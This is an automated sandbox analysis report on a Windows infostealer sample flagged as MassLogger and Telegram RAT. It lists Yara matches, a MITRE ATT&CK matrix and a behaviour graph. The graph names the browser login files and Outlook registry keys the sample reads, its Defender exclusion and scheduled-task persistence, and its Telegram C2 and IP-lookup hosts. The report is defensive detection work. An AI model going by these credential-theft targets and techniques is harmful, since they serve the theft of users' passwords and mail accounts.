                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		Logon Script (Windows)1
                  Scheduled Task/Job                  		3
                  Obfuscated Files or Information                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631784 Sample: UOEAjWmusE.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 2 other IPs or domains 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 12 other signatures 2->66 8 UOEAjWmusE.exe 6 2->8         started        12 gJdonuKfIrqN.exe 4 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 50->62 64 Uses the Telegram API (likely for C&C communication) 52->64 process4 file5 38 C:\Users\user\AppData\...\gJdonuKfIrqN.exe, PE32 8->38 dropped 40 C:\Users\...\gJdonuKfIrqN.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpF362.tmp, XML 8->42 dropped 68 Uses schtasks.exe or at.exe to add and modify task schedules 8->68 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 UOEAjWmusE.exe 15 2 8->17         started        20 schtasks.exe 1 8->20         started        26 2 other processes 8->26 74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 22 gJdonuKfIrqN.exe 14 2 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 WmiPrvSE.exe 14->28         started        30 conhost.exe 14->30         started        44 api.telegram.org 149.154.167.220, 443, 49693, 49694 TELEGRAMRU United Kingdom 17->44 46 checkip.dyndns.com 193.122.130.0, 49689, 49691, 80 ORACLE-BMC-31898US United States 17->46 48 reallyfreegeoip.org 104.21.16.1, 443, 49690, 49692 CLOUDFLARENETUS United States 17->48 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.